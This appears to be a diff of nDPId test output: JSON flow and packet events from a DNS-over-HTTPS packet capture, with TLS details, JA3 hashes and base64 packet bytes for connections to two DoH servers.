+00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04377{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739401922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAAuALHhAADcGBdJf2OWZCgAAAQG7q3Ca7wnPRlOpxlAQAfURoQAAFgMDAHoCAAB2AwPibR+Wkzsx56DJDm5Eu1YLQR+8sKrid6w\/L4hLlzFi7CA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HRMCAAAuACsAAgMEADMAJAAdACBuK8qBa63Irnemz8DqNJ321mRXUwu2HpEN9mUutJb4PxQDAwABARcDAwAkUOaHYP5iZ2NNWAzfU4nuMAsSlIi3Xu6evUH+ePghzyW3lf1oFwMDDTdyOxvGAqdaXqn7mk56YQOkftztBpxUe9++1VUjQL0UTPE4dDghDlADUJrVIMNoajw7OVNVUJlwwZLv4SY0Vx3I7ELfEhgQAcbo8KTKAm9O2ms4MsOpGyCQp3Ck5bHL2bE4iiWi1kZ3XUOEqkWhVOIsnrRavV3YbdvOPn4o+EZD19BNo16d7FYA9cwlYFl0b+UOCHVkbAV5Ro0aksFmIDr9nN\/SKS5iC8KA1HQko\/XCtoZt\/uj26L8Jnm5j0xvi5PCt7eYN7FAf9foi+urRIknTbj0qt5H6t5n2fn2SPs3+74zq4arLW6Grk5JVfjN+EFn6r2Kqt2DBASpVLNRJlEJ\/bKKlz+O8J7CBDjbsuIjIaIhIezaNNWlBddC5u8MicCjaXDfeK0Y4HdjfUV3F5+ceyWCg99LhDO6xG0CeQL6QAIRHV0AxoEVRoc\/2vMJczsdaR6IckxN7UiFIufmha90IusH6BRII8ooR6OU8Y+2rZzYh5iUJTMhKuwIGbOPxF0ajku7y5uTYXkibFy\/3YRErBGtPfTP8lfcsC0F+hSBQLoIlrMlmFjzaT8UDL1Fvuj09G9ZfRK\/xhCkh\/7LpCMAmZL6FGK8dmeyLYWLMckLWasSF4SpcTPWxHh7bEgM8pdQOrhyOwV2+YyGE03XoHny98Ri5sKrhPxH0mGzGNnfYcuH6skZHVwAgYnBYfjM2lceI\/e8LUGXM+\/wIkpWQtiAxj5n9jqC6nREJd3P5hFhhc0S7dmq+lc8Ma343e0W1q85dFAt5euDl0kwrHQBD26Gn0UFzkp+rMUWqJmbE4SEGibShhwSALXJQIigpcGwGc5IATb5iv3WP28Ditv7SIopWvMI9EzLxDQqdqFyPqSJV1GQA4imlHzXCdMmJY\/F6D02T5M85XegGn9Uw4gKTdpJtNdQMeDpMCJmwPpp3X9pZUOt1oTofSb+42UBMYdGAmqh\/lucphpoooHZAFYzgka8EA3+5grzvvRKo1W30cuUHEkcEYum5QQBIn5p1pvfjSQasw1NoCcIklAiODFbTUw\/XBBzGVXrXLo+F9mr5HZJoE6PhrzpGbM+TbC9rdnXfxtb3I6K\/1AuBezoFfnGsw9Dx8ypoJ2UB3C5fLrpS2ieFOMX42\/Dh6ibKZmCZ2IU\/pKi9Kpxz6Ld6HAwuoH4Me9ywi7Ln36mC5YB9\/TIfNIYZgMETrU\/MCg2bIGnZ8vBftq4oKoZH5CfsoxNFs2PFEG\/5CVigap\/tCrH2NE2mXjfyEkFGiVnnGzcQq0blObS7iaq5g9ULTtsStUYEWVhOXk\/yHu5D3\/u6I0Omh\/4izYUAvc\/ASGJ3mfA9dMkNtOEG3hZYmo5CA9GnSRpy2RNoU8Pnf1XinGwNO1Gx8Pk+Rv6O6rF61GXd3j8LIla3tC+sE1vn8o1HuVrg0vtx6svaMmP8iNm4OXIuTyI0c3BbAjgOOu1kSB8ysQJy2HfJ8f+33ewV4FsqQND6r5bZILZFNT6hlGwEaOaKRgd8Dnd4N9fsicUPP3uwhfe3QdvqzyV7OOrXV1IVMp9zwSZ0pMfc8VWLEkiJAKnWpdefyOUExkz5+iOPBxgjTOCDXI2cxb6a85tRWFrVYfRjxQzYvDOiZkMdWovVcpGmC70Cf9f8rBw+ttYEmVtXQq6aUTGji6XfZ4PQSD6aFRmGvyCQ+CTuysuZPRTT+5cBQgpxWr3YBN+426lIaYsxvZASckGkJyHw7wpODlcoQhARdIU2IKEFRJvw6DT5X9zlpEEie0WCTVJ\/dO+1+JbTJMju5fx4Qacw2bdHAKBR6bgpX06u1h2Q89XiuB5q4CfjBycr3kVeONIM0plxcqhvNckbcicJV\/JrJUajfW3F3ZFA8QjvfJykVgp6OKAIPXZNUHoSa3jNomftQSYqyBfMezehknXHShl6ZuQM+Lvb\/uVlinF17iXo2SvKnezJm3fj5cHaM4wuZjkDVCLAE\/Nyn58e9ksRwhD\/gK97rjgBNP1ml+iaYZj1YbBsIP0G755OxhWhcssAbTkI8hBniALaUqQLLPs72nFgtfIXuPTAuoXoMJT42ulwoxGs43\/GTmjksUYpRygFZP5B0dC11WQeR8PhWFcDRYGLV7beAlYwch7ld5nUdJC5mrDnIj419\/n346cz6AR7+0Rr1O5IOtvdQctvdWRZfPDcKiKYfWWWQsFX4uwaKZ7iAJIc3Lf2Hi65\/5WG2H6DXV2pbdFmOOEMbCE9vzIalbNO5yuH17ffgvNYeseN8QYcMc1RjXhkpanOQhCXFt4LROEa0cWaGgGU8KVcV0lHoP38Yqy9\/r9NNO4BBtoRTZYqyQ2KiKQOeL\/DjGmqmnMdtRKO3G2+28PYYcreNlQFUQC1YZRjis96nJONLOoYWGmJ0Ajkc88jEcPUWJ+sQ1Ellx00rNPIeTKszE7eeP1Wj7159+psV+5ymtU7Wt8kdIG49kp2vIgkZ9Wr8jWgezRdBIRoNkNszLOkziHLmtjo71cfnALRZTzE3WjtfCQAqXYkE67df0jceQto9+YJvgwPL7SKReSla4kC23BVgPVvhUiIRAomTXxQfxzJl60MjaMhKYx8sdY8yirN79hBVxNOKvYgeXSM9ea5v58WsOsjoz8vxu1i6IS+wpQDUJRL5+7QRTbXkU\/IgZJ2JwIpYJc0TbCcC+KyzLGP46kWX4\/BnWI6G+lC3q+tZ9lzQmQowB2OgB76ZZzVRvbALuU+R4sPYYq0cv634FKIpwY3EtlYdlCLWfp7ZlgIV62ujlYvHhZTRnGetjI9EyQMIK7XK1fm0YXedSc3g1l5p3dkHYgG0bAtbWa59V3\/IoYFT00HruXjbYzC5+RMiqTRk0M0TGZSrhfPeJjn02Zk7jMnppUxVbahEe2he8Uscmty4roTPIhZyQUTcLmzDMG3cPUpihzyQpbl0WSI0dX58QFWhZM7xH+JJmJ8yAAlZtScWFT+AUyElBRyoWx1bFwnu5cjcTiBOKcIA77CG8sc2sMV00Vn5xS5qVm32olnJkfc6ppnqNQxjiR9wVkT49+iYCtbdmX6IKyWQeVFgUqJQ5BvdNdt7w7dJUeuhPf3VRpEO\/JuTbLlvGkK\/mwXyq24LF3XMtkm5t69hBaSeNohEZao6QmYxZ+NYvxyXtLt2f77PL2m3kxOteUzIZiuV3nkbaSTk55VWkCshKS7HYDGARWAphsf+0I+2o6\/uoYI0UX5N6tebXNoxQAq6JRpkCJZ\/PM5xuxlj\/WGjyfe87wS7vqJa3nEKMo793Ew3S5oj8lEIMcctbFE7wTV1TjUaweZw+Z3iwk0WNd4mhDiOEObjosKaAJZJCKcwHWWPj3Pv6sHr9LXFpkSQghXzPF88XInFPHMmaNePQ5+SQ27ys1WSoLOzvUvoiLb3ySSw3OKanqLRonKV7Zpi0Ytvm7fQizCZ+5Ne\/y\/c1MIzQYpj0KO81JwrZo2y2Ztgzyet8\/H8T5HbkOQKczJbxrmsEvEXSl\/OZ3PT4cobEGmH79r1jJnga64YFXN1twHKTB5tOqayNYoY8HWJExA6ECQm2d8vIM6vU7wGAu00l0do6yKY07icxt6ZdPJ5cHBwXXmOf03M\/8KffX9hGO6Tv76sw1+cR37dJRviYmME\/l8otZxWSrf"}
-00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02081{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946739401922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1246,"pkt_l4_len":1212,"ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAATQLHpAADcGDIBf2OWZCgAAAQG7q3Ca7xUnRlOpxlAYAfU2WgAAHSeqZDGEXrFb+J1opG1dnPi4zgteeVslY9ZmFJlRTMTFOW+365tsM\/eWSLFN26wQY3yg0Y1FR+FA00qPga4\/wX0RoMfU+SI0dBiZB1tmIlqRr+vkKc2KX7jGL6yH9pbjNmGWfzy9B2zla2g4HVLW8pCqD27lbyw+DGZ\/hO2inmJfO0WMCDqHjCOm+F+BP64YRotqRni9BCcdPp\/FvRYRcX4k5KVXiCE2z69wUVsqPG1llKJj1CFH\/RsTm3g3KbtdQU0GjyNyQl2CDpurTyUPQ92fUKA\/X0cBMPJgzHC0dOP90IUWPM1DD3nsbrNmpz8lP9N79mRwF5LTOHbbfvAKtpN8hLwkt9ukwyBmXk8C+zmVLmgKdtBBeCiCgbaFL\/aA+J\/nNJ3jy0mYq5nUvVXTh2Z7\/bG7F7D15e+NHDTFMXBqoMonQB16IlIlFtAJa+1TB8nMDEieCqXSm2meI\/wkXXc32Srtv3AtM6vxPAOrV+x9rponJ6AacvE6\/cmUC4WCIDgujE5nGZYcMZSggbR9\/Kt6utpNlB5VFi1pEVrNaFZHw7aT6\/CtVG+zVSwvyQk0KhE6erbsuDtzZMxLvCtcsV6pPfC\/PRbO03YGJv8DK8LahvowpjPqbaymGAnYP9bBjmcj8Zybby5MtwMog5KW7YAI9rBYlENeM2Dy3vHARJIR5GB+j33qs5hvPkWTV3o9HKuDltN6e\/7cTcTid6DRvXmO1ZA7RcWnp1v9dX0nqCg+iwrqPJuk36pRQQSp3pYE1EAHLCzt3501t+KApLCxYzEbirRWptNyoeeEE5uOfBxYTM2WMleevobNDlfBM03M0aFglzGS3lCRV0yNWw\/ZBGahRO+XjHuBA+QxkBjzNIYvhBcDAwIZaqpl7KO\/aoS\/xaq63oePn\/l4wkgopi1lsaFYbJflvn5lJQcRSZHGqRIptAjGXWny5qRxC7sgGucrDoA5XZJpJ5rL1sQGrNBBnHYCcdhfkRgu0iYOklGG9xE+slZId49jcsAtWEU2I\/eEF\/gzGmcDoIKW9\/IU0pMNXTdWiWofVVPUZs\/Lb\/bN8htmbbfjLuBzEKhZpgveVlZPj5VXAuHEhXXk0ROaGAVglMZsxHsbdDUcKPQjQ9mHgMzqt\/SN4SKDhA1+9LRLSL4g\/ZmJxnsYsJZiPRXZLdaU9Cy+A4CQPYNfuO+XNekAtQHOOCFWcDjdfU7K6gPp+jdG+6zR71EFMeiGo9di5FuI+fsXGMjNiflcFg3\/oiEiQj+c+SXhXmg5cUUmZisM56tSTYoDbqV2I0clprpOcfYkTtT92I6EUzloL7npuW1zLxMXE7nwW5JzyWrlx3xaz6AAfotCwxm5ob\/ht48eMSnaGsDmVMmIKcAeXj9r\/Qgfm5ydj17A\/wWCVm\/7gADpBdFs4VTLiVB4jIonZRHnx0E40hyOWZIsEIEnMxJxrW8PkRcFDV5sXdcHtfh7iWchE466qSDTtK21gAz66LAGzIzDSi4jTfEAt1SbNYQ4BmQyjL19w9SMP8BzTvwsIFe6hnwpATT+7somRA\/Z26b4QEU5K1DZ7oOX\/WGJvzzyrIbd4MSiv77t6sgdhQ=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00837{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739402059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"ts_msec":946739402059,"pkt":"REREREREZmZmZmZmCABFAAFFMVtAAH4GEoIKAAABLuPINt7iAbvHEJB+u++XVVAYAfa5DQAAFgMBARgBAAEUAwMZSog080zqV7Jj5Dvb3ndcTDVXiuYN2\/F4nl5oM8685CAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJ7aJCDYGU5kBdEWwbRqPCTJbp2+gk2aiKbS3L7SQcx7"}
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739402097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAuAZpBAADcGGhIu48g2CgAAAQG73uK775dVxxCRm1AQAfXDSAAAFgMDAHoCAAB2AwMvYFLfcaEHo3aJMGXc3Nj5JHcSpejvVC+OlDWKY+lERSAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbRMCAAAuACsAAgMEADMAJAAdACCh186lBtHTNByoJBA0po27dnFNUREe5HIPKtcxu6S2dhQDAwABARcDAwAg9o2cPZarHTdrUnIxRn1VCbJHnvCJutGQQOHJwtgi\/RAXAwMOr0yaSOXTVxNy1MdOCL2l0VNtPnwh1Pur1Peod0tJjP9bgm\/AXbCeom1NL8K2T1J0dOI2RGuShy8YsyfJSw5Wmm071ESTozks9\/pWNhc8EY3OZk6mCQg3Q3y0vd4NtUzxexbQ\/ljBYll7ps6UiVrepG46JDr3EaPIsRJxAZ8gk2GaeDNtt7RJ53LkT05zfjvHMA6aBmH7t2BOZWkMQkrXRLmYtnSacXrlIzcJzUpGVRU0MO5jJX8g6q6PFhL59lDZu8Wsxk4Ijhyg4K8UnAjzRt0sqrXp6a0SqTxPZDzAPdhdwet3y+1QvN+aCu84nNSfCfN63IrHLSK6g6E3lem15SKv2YkiXF084ouwYBCBJXJ0DejPRccdH+Bp7CthOdZD9VLsoaB6QmK0BYE+B3JLwPXFYwO17RILfiGHekeCLv1KycofjSKkrY8yMabLa35ij5iLlwpIadsWJnwxXtZhNE88TO3LP+8rk3SThdBjlwIn02grC3P5DVdRHQUuYvIj+XumPYY4OniV3MWQD5oVffgmBaE\/MiLcfXRUvAgscquxip1c\/\/iyBNFRLF3RUPwBL5NcLPUAOiX8VC6qW6UmkIisNPyl59sHHQPhjQtTaV3HdBxVSxa+lXvafEDpCFPhfq7Z8DomnjFz314Mo2YICe+ZZ\/VP\/fu7\/DCzGaGMJt\/y8fB\/6C7VSPpretnL2mHkpzqNNsRNJHmpTbExTf\/W0z7d7eRfUyi4HRoWhN1u+9quMVSyao8SZFSb9c6pJV2Cpd+PDnrbNELHRV\/F65mKZXLF2SBEFyPK6XtRb+DOfMx0N6eOXr93S\/6+HvwSpArnHXm2qs+EDh7L5OyLbYX7hk\/pTg3eyPRsiU+T1VKMmTm3HYiEMmPROOISeM2PorfGczBqiAbHiPnaSSCDWzXHHee3yjPZXq9NGQADWivkdXNHAGorqs10ePRotp6azTgDg+3xjhiyUN8\/5\/JSc3Kyd9\/Y7eBwt2u3jJ0Ir1dMpZrh8Xytn\/oFEDmMRBapOHclfLOBBRZGJk+RA7J4ax9KIam6HVgRqufRZ7dV+VdgeVMjYSy4DQHs6oQV1dnsfERFBqYVQdJ93jWD1Gsdc8Pxx1qQ6tb7lnC4UqWJg2j4TF\/4asugxqLUp8iztI1CeTH4Reu1S6K\/rL+\/r1FEIu\/3a\/Pc+80qIi1Y87Z88cA68V6AnrKI\/jRFdeUnKaulroYDyincGpznQ32nbV7\/a8ufW3HqHzuY8Srdsdzg7OWNNr818v6m39ySIusJPgs5uFC9xvx8R+dIpVEYzkh3Q2eeeMG9\/8K2vIPpbbOtWSl8S5FN+69DYbQxN3KXTRYnKAcgBhodqiyj+6scHhaFARQYGoblFVqgXvJu7mshFdDHwBCaC5uowdNEKy4yrw5ottXf3H2NCsu9qcfXXi\/z\/OosB\/qYdcOqltwSq\/80V+8Ge38CLLZRSG\/4XrYzdhVDiFWoHxmaBU5QDEtQZH3S5OWqN1YkEB+FuSwADN6wY1gWAHclaDt280QNrqehBd4CwSsxy7G0qCDy36MMZMs7kf2Vj2TgH2Ktlytg+thkxDKtjS\/3aeMtSmm43ddFCAwkHZueXWUvoZnXP444s3zmu+73i2ZuHERFPrHSjFT+Y1Mpgo0Q6tWu1ilCv3IprR0S6yOnEJ5GH5r1Gf8ZIpGpefh36oorDOpgHiyqyCCd2qxXI8dwpeWwmWx2f1fKIN+bOmeDA+2HTL5b\/h\/S8LxTnnbWVqrgwQxdpAQ1xCVDtsVFko7TfSsPQoikR1NXdGw35qIw15E77U92szex\/zyWrA\/2KGcD2M3u3eNzXjjgmkxW27iRaDVs9Dg00I8PXscfPuLziMbIIt+Qm0SfB\/SFf1ylBL4HammClVdC7YNhrs4NDTvUTrxAf\/9BLynvePRrZvNzUMjBT8JtlvsBmnasO+COXrGwGyL50S3HH+eTrpMH9LMnT\/2nWeiT7sDmyjA9eJmW05\/8DRI8uR2ignlELeQeE7ZYC8KKYreOyXVjuVJO8KRaBbSIU8dUGF\/ILBa6hey1v4zK5JU1MHXOVQdX1RkKit5IUXefBWJ4R0BtjoPPFwKYAfyrsAKBcQzvKsyota24c0cDVjMzge24BKry1Tqr123sw9sTncyGrJzrjJCAkeCEkQo\/KqOKmxNrr6CtJmmIByoS+EjVKjVpJBluAdt5s3qw9VBr\/A44f7M4XZ82OLHYLOdXuuY4Rgtek4oFOa\/eUNUqECm7Y6b272wQZRBWvplBYlD2RWyR8BI01QWkzD2WfZpeGCzTSL5ABcGznl3CTw+DF6WcoeJd6SbUQUUEPVBF4u3zdh9b1Jl9zNuwWauO57o6a9eFR5unb1g++tHtZoIerFI1gyMEkvujqSt\/jK8uIRkRYOGlslTd\/3gwipdTVXxsLWi2fDz9+hxgVNOGQx8\/XNWyG1F\/L1mjtzU1UBNgZmslQP0EHO4J0uMMhguKNrTksx3df79c\/0PdkBKYtPr+8Ipj\/SC3QYRzf0s53zKfkSiObQ\/sOVJpwMvMhEUZunN4GQG+WMzs5eDRzdpQVJe47jiYijmkgXFbUCq004yxOCosLJYnsGKuZDQyE0z4teBgJH8ZC2mVlhO8lAz8gPU5mm5pEBH0gFKqsINKjcIbhVPUHYBlhBeR1erIfe5hsNdbM\/YCyGrep30hH+qZ\/IBF\/s3j2eRJAN56DPG7eQXCsiZSBsk9PTgJ38fSGAbaH0pLxsq2c1CaH7DzSlA01ud99lTK4rI7nRSGX9tAnrwTrORIzDrntkMH1VggJmMFY3EGxAMzh1CUd24C\/NVxnQ9P5qmX0Sgg6uSgxO2c7COAq2edHC\/ucd7dmb9rLGiOGU7YGRxfXuPTU+xfVNmV8wvcxQY9WY3QcHJbT2Vz2Hldj+q9L+347LUl4d5nRCyZOpijGWSFFM5lFqup\/GoObWXXvMsTO9NawTXovnf4MnjeZczPg2FrW3tlX0uBW7P24cE4VNHjvnvHknCsLft2dOFPhwAUA7qVOuJixr0stgCN8eCmK\/n1WzppsTm55hMBmYIkE9rYwxrxXiN39LFT+j0SlpiMqf5n1b7aJjSjiQjm1\/T42XF5prhRwaxJyOBzS5a2w2BxZDhOvMuBRY6ZtDe+ptzu07\/eUIO\/cQq36LXuMCRYTHNEIXnWWtA0vjAcmq+EwSCLEygFwVxoPgN5h2qTp7SdJVushbBgsziLiKFyhenEAkjP4tYMg82sWXtGvK2T4GbMrKF+OJsVll7gTGHENl+vuBtGryghKs2kRZov918dT+VWdywju+ew9zl+S0NiyZlvWu+CmHSGFpvtCqWMXNaXEERtmXJVFofSJ7ykCfNo49lq+tJOi\/mrPExexfpWVgisqVMvGukP+ZkhcE5Ck47mFMZqfJTRL364HqGaNbc7EKIab24NToEVrdLyvx+sQZXNXCyXhOVxnIWFgUdF0PMAFDvMwWrgJTufvZcx1q\/rK6GjKie1KAVcLQPkAeyb2aBh0GehIKRHB5OLWsjRXWSnC7RfnFW6K8cokr6NiSGrPTHJtZfW+014hI265qPA0R6qLZ3SkGPsU2l+ULOh8f4TsNZmRbk\/UzcCp9zJB2\/sAwMANTEmXxPw2yMWVIdXVMdzqrOV"}
-00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946739402097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAWWZpJAADcGH\/ou48g2CgAAAQG73uK776KtxxCRm1AYAfUU3AAACNSc59sPW4OZKm6qSD7jsBvdulSTgK8LagzUdpT43FqU1TjbgFd6vr1YcfE0NFplErjVqY14Uy0e6vIiPxevgsH6OdIHZm6pvnG3NGQZr+Eawc3lwPRCg\/OYwfYOVATUQ+D48eMINi076ymhr9WarR1T\/muiarwvLXYV6Uhar7rOYnX1fnOldHU7V9Vf3n22jVlaRu9FvfUlIGCuR9DlhblioT6Pi7Xq+9B1pO